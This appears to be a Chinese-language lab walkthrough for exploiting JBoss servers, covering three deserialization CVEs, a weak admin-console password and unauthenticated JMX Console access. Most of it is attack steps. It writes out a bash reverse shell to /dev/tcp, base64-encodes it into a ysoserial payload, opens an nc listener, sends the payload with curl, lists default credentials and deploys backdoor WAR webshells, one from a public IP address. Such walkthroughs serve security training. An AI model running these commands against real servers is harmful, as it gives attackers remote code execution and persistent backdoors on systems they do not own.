一。CVE-2015-7501

1.POC，访问地址

192.168.10.193:8080/invoker/JMXInvokerServlet

返回如下，说明接⼝开放，此接⼝存在反序列化漏洞

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/192.168.10.193/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5My82NjY2IDA+JjE=

java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5My82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser 

3.服务器设置监听得端⼝

nc -lvvp 6666

4.执⾏命令

curl 192.168.10.193:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.反弹成功

二。CVE-2017-7504

1.访问漏洞地址

192.168.10.193:8080/jbossmq-httpil/HTTPServerILServlet

2.获取shell

python3 jexboss.py -u http://192.168.33.193:8080/

三.CVE-2017-12149

1.访问漏洞⻚⾯

2.验证是否存在漏洞 , 访问

http://192.168.10.193:8080/invoker/readonly

该漏洞出现在/invoker/readonly中 ，服务器将⽤户post请求内容进⾏反序列化

3.使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可：

⼯具：https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执⾏命令： https://github.com/yunxu1/jboss-_CVE-2017-12149 

四.Administration Console弱⼝令

1.http://192.168.10.193:8080/admin-console/login.seam

2.登录admin vulhub

3.点击web应用，上传后门shell.war

4.连接WebShell

五.低版本JMX Console未授权

1.访问http://192.168.10.193:8080/jmx-console/

2.这⾥我们使⽤得复现环境不存在，所以需要密码（正常环境⽆需密码直接可进⼊）

admin admin

3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去（通过URL的⽅式远程部署）

4.找到⻚⾯中的void addURL() 选项远程加载war包来部署。

5.制作war包 填写war包远程地址

6.webshell连接

六.⾼版本JMX Console未授权

1.http://192.168.10.193:8080/jmx-console/

因为使⽤环境不存在该漏洞所以需要输⼊账户密码：admin vulhub

2.本地搭建部署点

在JMX Console⻚⾯点击jboss.system链接，在Jboss.system⻚⾯中点击service=MainDeployer，如下

3.进⼊service=MainDeployer⻚⾯之后，找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

4.

5.输⼊Invoke

http://47.121.136.171/shell.war

6.连接webshell

192.168.10.193:8080/shell/shell.jsp